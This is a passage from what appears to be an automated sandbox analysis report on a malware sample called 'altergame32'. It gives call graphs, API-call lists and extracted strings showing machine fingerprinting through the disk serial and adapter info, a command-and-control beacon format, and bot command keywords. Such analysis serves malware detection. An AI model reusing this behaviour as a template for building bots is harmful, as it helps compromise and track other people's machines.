API calls 61289->61290 
61293 2e4d12c 61290->61293 61291 2e4d21a 61291->61158 61292 2e42db5 73 API calls 61292->61293 61293->61291 61293->61292 61295 2e48404 WSASetLastError shutdown 61294->61295 61296 2e483f4 61294->61296 61298 2e4a508 69 API calls 61295->61298 61297 2e50b10 Mailbox 68 API calls 61296->61297 61299 2e47ac7 61297->61299 61300 2e48421 61298->61300 61302 2e433b2 61299->61302 61300->61299 61301 2e50b10 Mailbox 68 API calls 61300->61301 61301->61299 61303 2e433c4 InterlockedCompareExchange 61302->61303 61304 2e433e1 61302->61304 61303->61304 61305 2e433d6 61303->61305 61306 2e429ee 76 API calls 61304->61306 61791 2e432ab 78 API calls 2 library calls 61305->61791 61308 2e433f1 61306->61308 61308->61151 61309->61166 61310->61166 61311->61166 61312->61169 61313->61185 61314->61186 61315->61091 61316->61136 61317->61197 61318->61199 61319->61195 61321 2e4e009 __EH_prolog 61320->61321 61322 2e53b4c _Allocate 60 API calls 61321->61322 61323 2e4e020 61322->61323 61323->61203 61325 2e4513d 61324->61325 61326 2e50b39 61324->61326 61325->61208 61327 2e533a4 __cinit 68 API calls 61326->61327 61327->61325 61329 2e50b10 Mailbox 68 API calls 61328->61329 61330 2e4cef2 61329->61330 61331 2e4d001 61330->61331 61333 2e42b95 61330->61333 61331->61214 61334 2e42bc7 61333->61334 61335 2e42bb1 61333->61335 61337 2e42bdf 61334->61337 61338 2e42bd2 61334->61338 61336 2e50b10 Mailbox 68 API calls 61335->61336 61342 2e42bb6 61336->61342 61339 2e42be2 WSASetLastError WSARecv 61337->61339 61337->61342 61343 2e42d22 61337->61343 61345 2e42cbc WSASetLastError select 61337->61345 61346 2e50b10 68 API calls Mailbox 61337->61346 61340 2e50b10 Mailbox 68 API calls 61338->61340 61348 2e4a508 61339->61348 61340->61342 61342->61330 61351 2e41996 68 API calls __cinit 61343->61351 61347 2e4a508 69 API calls 61345->61347 61346->61337 61347->61337 61349 2e50b10 Mailbox 68 API calls 61348->61349 61350 2e4a514 WSAGetLastError 61349->61350 61350->61337 61351->61342 61352->61236 61361 2e533b9 61353->61361 61355 2e52114 
61355->61238 61357 2e5213d ResumeThread 61357->61238 61358 2e52136 CloseHandle 61358->61357 61359->61241 61362 2e533c7 61361->61362 61363 2e533db 61361->61363 61385 2e55e5b 59 API calls __getptd_noexit 61362->61385 61365 2e58a6d __calloc_crt 59 API calls 61363->61365 61368 2e533e8 61365->61368 61366 2e533cc 61386 2e54ef5 9 API calls __fclose_nolock 61366->61386 61369 2e53439 61368->61369 61380 2e55c5a 61368->61380 61371 2e52f74 _free 59 API calls 61369->61371 61373 2e5343f 61371->61373 61375 2e5210b 61373->61375 61387 2e55e3a 59 API calls 2 library calls 61373->61387 61374 2e55ce1 __initptd 59 API calls 61376 2e533fe CreateThread 61374->61376 61375->61355 61375->61357 61375->61358 61376->61375 61379 2e53431 GetLastError 61376->61379 61404 2e53519 61376->61404 61379->61369 61388 2e55c72 GetLastError 61380->61388 61382 2e55c60 61383 2e533f5 61382->61383 61402 2e58440 59 API calls 3 library calls 61382->61402 61383->61374 61385->61366 61386->61375 61387->61375 61389 2e591cb __getptd_noexit TlsGetValue 61388->61389 61390 2e55c87 61389->61390 61391 2e55cd5 SetLastError 61390->61391 61392 2e58a6d __calloc_crt 56 API calls 61390->61392 61391->61382 61393 2e55c9a 61392->61393 61393->61391 61403 2e591ea TlsSetValue 61393->61403 61395 2e55cae 61396 2e55cb4 61395->61396 61397 2e55ccc 61395->61397 61398 2e55ce1 __initptd 56 API calls 61396->61398 61399 2e52f74 _free 56 API calls 61397->61399 61400 2e55cbc GetCurrentThreadId 61398->61400 61401 2e55cd2 61399->61401 61400->61391 61401->61391 61403->61395 61405 2e53522 __threadstartex@4 61404->61405 61406 2e591cb __getptd_noexit TlsGetValue 61405->61406 61407 2e53528 61406->61407 61408 2e5352f __threadstartex@4 61407->61408 61409 2e5355b 61407->61409 61436 2e591ea TlsSetValue 61408->61436 61437 2e55aef 59 API calls 6 library calls 61409->61437 61411 2e53576 ___crtIsPackagedApp 61414 2e5358a 61411->61414 61420 2e534c1 61411->61420 61413 2e5353e 61415 2e53544 GetLastError RtlExitUserThread 61413->61415 61416 2e53551 
GetCurrentThreadId 61413->61416 61426 2e53452 61414->61426 61415->61416 61416->61411 61421 2e53503 RtlDecodePointer 61420->61421 61422 2e534ca LoadLibraryExW GetProcAddress 61420->61422 61425 2e53513 61421->61425 61423 2e534ed RtlEncodePointer 61422->61423 61424 2e534ec 61422->61424 61423->61421 61424->61414 61425->61414 61427 2e5345e __fcloseall 61426->61427 61428 2e55c5a _LocaleUpdate::_LocaleUpdate 59 API calls 61427->61428 61429 2e53463 61428->61429 61438 2e52160 61429->61438 61432 2e53473 61433 2e58d94 __XcptFilter 59 API calls 61432->61433 61434 2e53484 61433->61434 61436->61413 61437->61411 61456 2e51610 61438->61456 61441 2e521b0 61478 2e4ddb3 61441->61478 61442 2e521a8 TlsSetValue 61442->61441 61447 2e53493 61448 2e55c72 __getptd_noexit 59 API calls 61447->61448 61449 2e5349c 61448->61449 61450 2e534b7 RtlExitUserThread 61449->61450 61451 2e534b0 61449->61451 61452 2e534ab 61449->61452 61594 2e55c24 59 API calls 2 library calls 61451->61594 61593 2e53596 LoadLibraryExW GetProcAddress RtlEncodePointer RtlDecodePointer 61452->61593 61455 2e534b6 61455->61450 61474 2e51674 61456->61474 61457 2e516f0 61458 2e51706 61457->61458 61459 2e51703 CloseHandle 61457->61459 61494 2e5454b 61458->61494 61459->61458 61460 2e516ce ResetEvent 61466 2e516d5 61460->61466 61462 2e5179c WaitForSingleObject 61462->61474 61463 2e516a5 OpenEventA 61468 2e516c7 61463->61468 61469 2e516bf 61463->61469 61464 2e5168c 61464->61460 61464->61463 61501 2e51c10 GetCurrentProcessId 61464->61501 61465 2e5171e 61465->61441 61465->61442 61502 2e51850 CreateEventA CloseHandle SetEvent GetCurrentProcessId 61466->61502 61468->61460 61468->61466 61469->61468 61471 2e516c4 CloseHandle 61469->61471 61470 2e516a2 61470->61463 61471->61468 61472 2e51770 CreateEventA 61472->61474 61474->61457 61474->61462 61474->61464 61474->61472 61476 2e5178e CloseHandle 61474->61476 61503 2e51c10 GetCurrentProcessId 61474->61503 61476->61474 61477 2e516ed 61477->61457 61479 2e4ddd5 61478->61479 61505 2e44d86 
61479->61505 61480 2e4ddd8 61482 2e51f30 61480->61482 61483 2e51f69 TlsGetValue 61482->61483 61492 2e51f61 Mailbox 61482->61492 61483->61492 61484 2e51fdd 61485 2e52006 61484->61485 61489 2e51ffe GetProcessHeap HeapFree 61484->61489 61485->61447 61486 2e51fb9 61487 2e51610 17 API calls 61486->61487 61490 2e51fc8 61487->61490 61488 2e52049 GetProcessHeap HeapFree 61488->61492 61489->61485 61490->61484 61491 2e51fd5 TlsSetValue 61490->61491 61491->61484 61492->61484 61492->61486 61492->61488 61493 2e5203b GetProcessHeap HeapFree 61492->61493 61493->61488 61495 2e54555 IsProcessorFeaturePresent 61494->61495 61496 2e54553 61494->61496 61498 2e5958f 61495->61498 61496->61465 61504 2e5953e 5 API calls 2 library calls 61498->61504 61500 2e59672 61500->61465 61501->61470 61502->61477 61503->61474 61504->61500 61506 2e44d90 __EH_prolog 61505->61506 61507 2e50b10 Mailbox 68 API calls 61506->61507 61508 2e44da6 RtlEnterCriticalSection RtlLeaveCriticalSection 61507->61508 61509 2e450d4 shared_ptr 61508->61509 61522 2e44dd1 std::bad_exception::bad_exception 61508->61522 61509->61480 61511 2e450a1 RtlEnterCriticalSection RtlLeaveCriticalSection 61512 2e450b3 RtlEnterCriticalSection RtlLeaveCriticalSection 61511->61512 61512->61509 61512->61522 61513 2e4a724 73 API calls 61513->61522 61515 2e44e8d RtlEnterCriticalSection RtlLeaveCriticalSection 61516 2e44e9f RtlEnterCriticalSection RtlLeaveCriticalSection 61515->61516 61516->61522 61517 2e4ced8 73 API calls 61517->61522 61522->61511 61522->61512 61522->61513 61522->61515 61522->61516 61522->61517 61525 2e44bed 61522->61525 61549 2e47d23 60 API calls 61522->61549 61550 2e4d00a 60 API calls 2 library calls 61522->61550 61551 2e47cfd 60 API calls std::bad_exception::bad_exception 61522->61551 61552 2e4a9b1 60 API calls 2 library calls 61522->61552 61553 2e4aa89 210 API calls 3 library calls 61522->61553 61554 2e518f0 GetProcessHeap HeapFree 61522->61554 61555 2e44100 GetProcessHeap HeapFree 61522->61555 61526 2e44bf7 __EH_prolog 
61525->61526 61527 2e41ba7 209 API calls 61526->61527 61528 2e44c31 61527->61528 61556 2e43a94 61528->61556 61530 2e44c3c 61531 2e43a94 60 API calls 61530->61531 61532 2e44c56 61531->61532 61559 2e485d1 61532->61559 61537 2e50b10 Mailbox 68 API calls 61538 2e44cb8 61537->61538 61584 2e4c28f 61538->61584 61540 2e44ce1 InterlockedExchange 61588 2e42995 95 API calls Mailbox 61540->61588 61544 2e44d06 61548 2e44d3c 61544->61548 61589 2e4858d 76 API calls Mailbox 61544->61589 61590 2e482f7 82 API calls Mailbox 61544->61590 61591 2e42995 95 API calls Mailbox 61544->61591 61545 2e44d57 shared_ptr 61545->61522 61592 2e4861a 75 API calls 2 library calls 61548->61592 61549->61522 61550->61522 61551->61522 61552->61522 61553->61522 61554->61522 61555->61522 61557 2e439ee 60 API calls 61556->61557 61558 2e43ab5 61557->61558 61558->61530 61560 2e50b10 Mailbox 68 API calls 61559->61560 61561 2e485e7 61560->61561 61562 2e49a20 77 API calls 61561->61562 61563 2e48601 61562->61563 61564 2e41712 60 API calls 61563->61564 61565 2e44c8b 61564->61565 61566 2e4e0f7 61565->61566 61567 2e4e101 __EH_prolog 61566->61567 61568 2e41a01 61 API calls 61567->61568 61569 2e4e118 61568->61569 61570 2e4e155 InterlockedExchangeAdd 61569->61570 61572 2e50b10 Mailbox 68 API calls 61569->61572 61573 2e4e185 61570->61573 61574 2e4e190 RtlEnterCriticalSection 61570->61574 61572->61570 61575 2e41ec7 InterlockedIncrement PostQueuedCompletionStatus RtlEnterCriticalSection InterlockedExchange RtlLeaveCriticalSection 61573->61575 61576 2e47f5a 60 API calls 61574->61576 61577 2e4e18e 61575->61577 61578 2e4e1b6 InterlockedIncrement 61576->61578 61582 2e4e851 TlsGetValue 61577->61582 61579 2e4e1c6 61578->61579 61580 2e4e1cd RtlLeaveCriticalSection 61578->61580 61581 2e427f3 SetWaitableTimer 61579->61581 61580->61577 61581->61580 61583 2e44ca4 61582->61583 61583->61537 61585 2e4c2a2 61584->61585 61586 2e4c2cb 61585->61586 61587 2e4e9c0 83 API calls 61585->61587 61586->61540 61587->61586 61588->61544 61589->61544 
61590->61544 61591->61544 61592->61545 61593->61451 61594->61455 61595->61250 61596->61253 61597->61253 61598->61257 61600 2e4e339 __EH_prolog 61599->61600 61601 2e53b4c _Allocate 60 API calls 61600->61601 61602 2e4e342 61601->61602 61603 2e41bfa RtlEnterCriticalSection 61602->61603 61605 2e4e550 61602->61605 61603->61262 61606 2e4e55a __EH_prolog 61605->61606 61609 2e426db RtlEnterCriticalSection 61606->61609 61608 2e4e5b0 61608->61603 61610 2e4277e 61609->61610 61611 2e42728 CreateWaitableTimerA 61609->61611 61614 2e427d5 RtlLeaveCriticalSection 61610->61614 61616 2e53b4c _Allocate 60 API calls 61610->61616 61612 2e42738 GetLastError 61611->61612 61613 2e4275b SetWaitableTimer 61611->61613 61615 2e50b10 Mailbox 68 API calls 61612->61615 61613->61610 61614->61608 61617 2e42745 61615->61617 61618 2e4278a 61616->61618 61653 2e41712 61617->61653 61620 2e427c8 61618->61620 61621 2e53b4c _Allocate 60 API calls 61618->61621 61659 2e47e02 CloseHandle 61620->61659 61623 2e427a9 61621->61623 61625 2e41cf8 CreateEventA 61623->61625 61626 2e41d52 CreateEventA 61625->61626 61627 2e41d23 GetLastError 61625->61627 61628 2e41d6b GetLastError 61626->61628 61645 2e41d96 61626->61645 61630 2e41d33 61627->61630 61631 2e41d7b 61628->61631 61629 2e533b9 __beginthreadex 201 API calls 61632 2e41db6 61629->61632 61633 2e50b10 Mailbox 68 API calls 61630->61633 61634 2e50b10 Mailbox 68 API calls 61631->61634 61635 2e41dc6 GetLastError 61632->61635 61636 2e41e0d 61632->61636 61637 2e41d3c 61633->61637 61638 2e41d84 61634->61638 61643 2e41dd8 61635->61643 61639 2e41e11 WaitForSingleObject CloseHandle 61636->61639 61640 2e41e1d 61636->61640 61641 2e41712 60 API calls 61637->61641 61642 2e41712 60 API calls 61638->61642 61639->61640 61640->61620 61644 2e41d4e 61641->61644 61642->61645 61646 2e41ddc CloseHandle 61643->61646 61647 2e41ddf 61643->61647 61644->61626 61645->61629 61646->61647 61648 2e41dee 61647->61648 61649 2e41de9 CloseHandle 61647->61649 61650 2e50b10 Mailbox 68 API calls 
61648->61650 61649->61648 61651 2e41dfb 61650->61651 61652 2e41712 60 API calls 61651->61652 61652->61636 61654 2e4171c __EH_prolog 61653->61654 61655 2e4173e 61654->61655 61660 2e41815 59 API calls std::exception::exception 61654->61660 61655->61613 61657 2e41732 61661 2e4a4a1 60 API calls 2 library calls 61657->61661 61659->61614 61660->61657 61673 2e430ae WSASetLastError 61662->61673 61665 2e430ae 71 API calls 61666 2e43c90 61665->61666 61667 2e416ae 61666->61667 61668 2e416b8 __EH_prolog 61667->61668 61669 2e41701 61668->61669 61689 2e524d3 59 API calls std::exception::_Copy_str 61668->61689 61669->61271 61671 2e416dc 61690 2e4a4a1 60 API calls 2 library calls 61671->61690 61674 2e430ec WSAStringToAddressA 61673->61674 61675 2e430ce 61673->61675 61676 2e4a508 69 API calls 61674->61676 61675->61674 61677 2e430d3 61675->61677 61678 2e43114 61676->61678 61679 2e50b10 Mailbox 68 API calls 61677->61679 61680 2e4311e _memcmp 61678->61680 61682 2e43154 61678->61682 61687 2e430d8 61679->61687 61681 2e43135 61680->61681 61685 2e50b10 Mailbox 68 API calls 61680->61685 61684 2e50b10 Mailbox 68 API calls 61681->61684 61686 2e43193 61681->61686 61682->61681 61683 2e50b10 Mailbox 68 API calls 61682->61683 61683->61681 61684->61686 61685->61681 61686->61687 61688 2e50b10 Mailbox 68 API calls 61686->61688 61687->61665 61687->61666 61688->61687 61689->61671 61691->61276 61692->61277 61714 2e4353e 61693->61714 61697 2e42ae8 WSASetLastError connect 61696->61697 61698 2e42ad8 61696->61698 61700 2e4a508 69 API calls 61697->61700 61699 2e50b10 Mailbox 68 API calls 61698->61699 61701 2e42add 61699->61701 61702 2e42b07 61700->61702 61704 2e50b10 Mailbox 68 API calls 61701->61704 61702->61701 61703 2e50b10 Mailbox 68 API calls 61702->61703 61703->61701 61705 2e42b1b 61704->61705 61706 2e50b10 Mailbox 68 API calls 61705->61706 61708 2e42b38 61705->61708 61706->61708 61710 2e42b87 61708->61710 61765 2e43027 71 API calls Mailbox 61708->61765 61709 2e42b59 61709->61710 61766 2e42fb4 71 API 

                                                                  Control-flow Graph

                                                                  • Graph not reproduced (first block 2e472ab-2e472c3, InternetOpenA; legend: Executed / Not Executed)
                                                                  APIs
                                                                  • Sleep.KERNEL32(0000EA60), ref: 02E46708
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E46713
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E46724
                                                                  • InternetOpenA.WININET(?), ref: 02E472B5
                                                                  • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02E472DD
                                                                  • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02E472F5
                                                                  • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02E4730D
                                                                  • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02E47336
                                                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02E47358
                                                                  • InternetCloseHandle.WININET(00000000), ref: 02E47378
                                                                  • InternetCloseHandle.WININET(00000000), ref: 02E47383
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E473EE
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E473FF
                                                                  • _malloc.LIBCMT ref: 02E47498
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E474AA
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E474B6
                                                                  • _malloc.LIBCMT ref: 02E4758E
                                                                  • _strtok.LIBCMT ref: 02E475BF
                                                                  • _swscanf.LIBCMT ref: 02E475D6
                                                                  • _strtok.LIBCMT ref: 02E475ED
                                                                  • _free.LIBCMT ref: 02E475F9
                                                                  • Sleep.KERNEL32(000007D0), ref: 02E476F1
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E47772
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E47784
                                                                  • _sprintf.LIBCMT ref: 02E47822
                                                                  • RtlEnterCriticalSection.NTDLL(00000020), ref: 02E478E6
                                                                  • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02E4791A
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                  • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                  • API String ID: 1657546717-1839899575
                                                                  • Opcode ID: 42e35dc443596ecd6ad8ef919a29b4e1970f0625e71b35eef4f40a1d59952da9
                                                                  • Instruction ID: a03bde155487a412312432de5e9e2afb080eb0ff69cd5294aab116e92ea4f81b
                                                                  • Opcode Fuzzy Hash: 42e35dc443596ecd6ad8ef919a29b4e1970f0625e71b35eef4f40a1d59952da9
                                                                  • Instruction Fuzzy Hash: 123227316C8381AFE7349B20EC05BAFB7E5AF85358F10981DF98997291DF709544CB62

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • RtlInitializeCriticalSection.NTDLL(02E771E0), ref: 02E464BA
                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02E464D1
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02E464DA
                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02E464E9
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02E464EC
                                                                  • GetTickCount.KERNEL32 ref: 02E464F8
                                                                    • Part of subcall function 02E4605A: _malloc.LIBCMT ref: 02E46068
                                                                  • GetVersionExA.KERNEL32(02E77038), ref: 02E46525
                                                                  • _malloc.LIBCMT ref: 02E46551
                                                                    • Part of subcall function 02E52FAC: __FF_MSGBANNER.LIBCMT ref: 02E52FC3
                                                                    • Part of subcall function 02E52FAC: __NMSG_WRITE.LIBCMT ref: 02E52FCA
                                                                    • Part of subcall function 02E52FAC: RtlAllocateHeap.NTDLL(009A0000,00000000,00000001), ref: 02E52FEF
                                                                  • _malloc.LIBCMT ref: 02E46561
                                                                  • _malloc.LIBCMT ref: 02E4656C
                                                                  • _malloc.LIBCMT ref: 02E46577
                                                                  • _malloc.LIBCMT ref: 02E46582
                                                                  • _malloc.LIBCMT ref: 02E4658D
                                                                  • _malloc.LIBCMT ref: 02E46598
                                                                  • _malloc.LIBCMT ref: 02E465A7
                                                                  • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02E465BE
                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02E465C7
                                                                  • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02E465D6
                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02E465D9
                                                                  • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02E465E4
                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02E465E7
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E46621
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E4662E
                                                                  • _malloc.LIBCMT ref: 02E46652
                                                                  • _malloc.LIBCMT ref: 02E46660
                                                                  • _malloc.LIBCMT ref: 02E46667
                                                                  • _malloc.LIBCMT ref: 02E4668D
                                                                  • QueryPerformanceCounter.KERNEL32(00000200), ref: 02E466A0
                                                                  • Sleep.KERNEL32 ref: 02E466AE
                                                                  • _malloc.LIBCMT ref: 02E466BA
                                                                  • _malloc.LIBCMT ref: 02E466C7
                                                                  • Sleep.KERNEL32(0000EA60), ref: 02E46708
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E46713
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E46724
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                  • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                  • API String ID: 4273019447-2678694477
                                                                  • Opcode ID: c52bd01b55966f7e9b654e894a46df5ab2fb98f3df0cb0b09d0718842d6e26cd
                                                                  • Instruction ID: a856da462a43256485e634bcdccd6c55e9e6e98f20e641d6fd0e334641219c23
                                                                  • Opcode Fuzzy Hash: c52bd01b55966f7e9b654e894a46df5ab2fb98f3df0cb0b09d0718842d6e26cd
                                                                  • Instruction Fuzzy Hash: F071E871DD8350AFE710AF31AC09B5BBBE8EF85354F049819FA4497281DBB45840CFA6

                                                                  Control-flow Graph

                                                                  • Graph not reproduced (first block 401b4b-401b68, LoadLibraryA; legend: Executed / Not Executed)
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00401B5D
                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                  • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                  • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                  • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                  • API String ID: 514930453-3667123677
                                                                  • Opcode ID: a648eded5dba78bf16f4a137e2c2b6b7b052dc293c02733a72e5b458839b5e0e
                                                                  • Instruction ID: a9f54c968f2091474e8feb0d981771773be25d9c6ef5ebc30493122ab1168d3f
                                                                  • Opcode Fuzzy Hash: a648eded5dba78bf16f4a137e2c2b6b7b052dc293c02733a72e5b458839b5e0e
                                                                  • Instruction Fuzzy Hash: E821B870904209AEDF219F65C9447EF7FB8EF45345F0440BAE604B62A1E7389A85CB69

                                                                  Control-flow Graph

                                                                  • Graph not reproduced (first block 2e4f9a6-2e4f9c9, LoadLibraryA; legend: Executed / Not Executed)
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02E4F9BC
                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02E4F9D5
                                                                  • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02E4F9FA
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 02E4FA83
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                  • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                  • API String ID: 514930453-3114217049
                                                                  • Opcode ID: 765b12ab7b5d43115f7e59b00d31b058b0941b1222fa93f6c2ea8d7f06c28695
                                                                  • Instruction ID: fb02a44fa078425be4adc0e655e48e3f9fc750405569390d3841981f54faed03
                                                                  • Opcode Fuzzy Hash: 765b12ab7b5d43115f7e59b00d31b058b0941b1222fa93f6c2ea8d7f06c28695
                                                                  • Instruction Fuzzy Hash: BB21D731E802099FDF10CFA9A8446EEBBF9EF05748F1491AAD405E7610DF308945CBA0

                                                                  Control-flow Graph

                                                                  • Graph not reproduced (first block 2e4f8a2-2e4f8cd, CreateFileA; legend: Executed / Not Executed)
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02E4F8C1
                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02E4F8FF
                                                                  • GetLastError.KERNEL32 ref: 02E4F960
                                                                  • CloseHandle.KERNEL32(?), ref: 02E4F997
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                  • String ID: \\.\PhysicalDrive0
                                                                  • API String ID: 4026078076-1180397377
                                                                  • Opcode ID: 194707ef53f16e761ca43085f5e57597237e9287fca48b3f0d0a2bf0e40745d9
                                                                  • Instruction ID: 2840af3d0c5dddb18e9a52857f628382dc4c0cbc4f92be5f72d347e8161c7bf5
                                                                  • Opcode Fuzzy Hash: 194707ef53f16e761ca43085f5e57597237e9287fca48b3f0d0a2bf0e40745d9
                                                                  • Instruction Fuzzy Hash: 98318471D80219BBDB14CFD9E884BAFBBB5EB48B58F109169E605A7640DB705A00CB90

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                  • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                  • GetLastError.KERNEL32 ref: 00401B0E
                                                                  • CloseHandle.KERNEL32(?), ref: 00401B3D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                  • String ID: \\.\PhysicalDrive0
                                                                  • API String ID: 4026078076-1180397377

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02E41D11
                                                                  • GetLastError.KERNEL32 ref: 02E41D23
                                                                    • Part of subcall function 02E41712: __EH_prolog.LIBCMT ref: 02E41717
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02E41D59
                                                                  • GetLastError.KERNEL32 ref: 02E41D6B
                                                                  • __beginthreadex.LIBCMT ref: 02E41DB1
                                                                  • GetLastError.KERNEL32 ref: 02E41DC6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 02E41DDD
                                                                  • CloseHandle.KERNEL32(00000000), ref: 02E41DEC
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02E41E14
                                                                  • CloseHandle.KERNEL32(00000000), ref: 02E41E1B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                  • String ID: thread$thread.entry_event$thread.exit_event
                                                                  • API String ID: 831262434-3017686385

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 02E44D8B
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E44DB7
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E44DC3
                                                                    • Part of subcall function 02E44BED: __EH_prolog.LIBCMT ref: 02E44BF2
                                                                    • Part of subcall function 02E44BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02E44CF2
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E44E93
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E44E99
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E44EA0
